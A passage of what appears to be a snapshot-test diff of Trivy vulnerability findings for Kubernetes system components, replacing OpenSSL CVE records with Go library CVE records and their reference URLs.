panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5038-1", + "value": "https://avd.aquasec.com/nvd/cve-2021-38561", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3449", + "value": "https://access.redhat.com/security/cve/CVE-2021-38561", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4875", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210325.txt", + "value": "https://deps.dev/advisory/OSV/GO-2021-0113", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://go.dev/cl/340830", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-05", + "value": "https://pkg.go.dev/golang.org/x/text/language", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-06", + "value": "https://pkg.go.dev/vuln/GO-2021-0113", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u8", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-4160", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.6", + "packageName": "golang.org/x/text", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-4160", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", - "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", - "https://security.gentoo.org/glsa/202210-02", - "https://www.cve.org/CVERecord?id=CVE-2021-4160", - "https://www.debian.org/security/2022/dsa-5103", - "https://www.openssl.org/news/secadv/20220128.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "There is a carry propagation bug in the MIPS32 and MIPS64 squaring procedure. Many EC algorithms are affected, including some of the TLS 1.3 default curves. Impact was not analyzed in detail, because the pre-requisites for attack are considered unlikely and include reusing private keys. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH private key among multiple clients, which is no longer an option since CVE-2016-0701. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0.0. It was addressed in the releases of 1.1.1m and 3.0.1 on the 15th of December 2021. For the 1.0.2 release it is addressed in git commit 6fc1aaaf3 that is available to premium support customers only. It will be made available in 1.0.2zc when it is released. The issue only affects OpenSSL on MIPS platforms. Fixed in OpenSSL 3.0.1 (Affected 3.0.0). Fixed in OpenSSL 1.1.1m (Affected 1.1.1-1.1.1l). Fixed in OpenSSL 1.0.2zc-dev (Affected 1.0.2-1.0.2zb).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "openssl: Carry propagation bug in the MIPS32 and MIPS64 squaring procedure", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-4160", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-4160", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-4160", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5103", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220128.txt", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5873-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2097", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27191", + "installedVersion": "v0.0.0-20220131195533-30dcbda58838", + "packageName": "golang.org/x/crypto", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2097", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", - "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", - "https://linux.oracle.com/cve/CVE-2022-2097.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", - "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220715-0011/", - "https://security.netapp.com/advisory/ntap-20230420-0008/", - "https://ubuntu.com/security/notices/USN-5502-1", - "https://www.cve.org/CVERecord?id=CVE-2022-2097", - "https://www.debian.org/security/2023/dsa-5343", - "https://www.openssl.org/news/secadv/20220705.txt", + "https://access.redhat.com/errata/RHSA-2022:8008", + "https://access.redhat.com/security/cve/CVE-2022-27191", + "https://bugzilla.redhat.com/1939485", + "https://bugzilla.redhat.com/1989564", + "https://bugzilla.redhat.com/1989570", + "https://bugzilla.redhat.com/1989575", + "https://bugzilla.redhat.com/2064702", + "https://bugzilla.redhat.com/2121445", + "https://bugzilla.redhat.com/2121453", + "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "https://go.dev/cl/392355", + "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "https://linux.oracle.com/cve/CVE-2022-27191.html", + "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "https://pkg.go.dev/vuln/GO-2021-0356", + "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "https://security.netapp.com/advisory/ntap-20220429-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-27191", ], }, "category": "Vulnerability", - "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "AES OCB fails to encrypt some bytes", + "name": "crash in a golang.org/x/crypto/ssh server", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2097", + "value": "https://avd.aquasec.com/nvd/cve-2022-27191", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", + "value": "https://access.redhat.com/errata/RHSA-2022:8008", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2097", + "value": "https://access.redhat.com/security/cve/CVE-2022-27191", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", + "value": "https://bugzilla.redhat.com/1939485", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", + "value": "https://bugzilla.redhat.com/1989564", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", + "value": "https://bugzilla.redhat.com/1989570", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://bugzilla.redhat.com/1989575", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://bugzilla.redhat.com/2064702", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://bugzilla.redhat.com/2121445", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://bugzilla.redhat.com/2121453", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "value": "https://go.dev/cl/392355", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2021-0356", + }, + { + "type": "URL", + "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20211209124913-491a49abca63", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-44716", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-44716", + "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "https://github.com/golang/go/issues/50058", + "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "https://go.dev/cl/369794", + "https://go.dev/issue/50058", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "https://linux.oracle.com/cve/CVE-2021-44716.html", + "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "https://pkg.go.dev/vuln/GO-2022-0288", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220121-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-44716", + ], + }, + "category": "Vulnerability", + "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "golang: net/http: limit growth of header canonicalization cache", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + }, + { + "type": "URL", + "value": "https://access.redhat.com/security/cve/CVE-2021-44716", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://github.com/golang/go/issues/50058", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", + "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", + "value": "https://go.dev/cl/369794", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5502-1", + "value": "https://go.dev/issue/50058", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5343", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220705.txt", + "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4304", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4304", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", - "https://linux.oracle.com/cve/CVE-2022-4304.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", - "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4304", - "https://www.openssl.org/news/secadv/20230207.txt", - ], - }, - "category": "Vulnerability", - "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "timing attack in RSA Decryption implementation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4304", + "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4304", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://pkg.go.dev/vuln/GO-2022-0288", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", }, { "type": "URL", - "value": 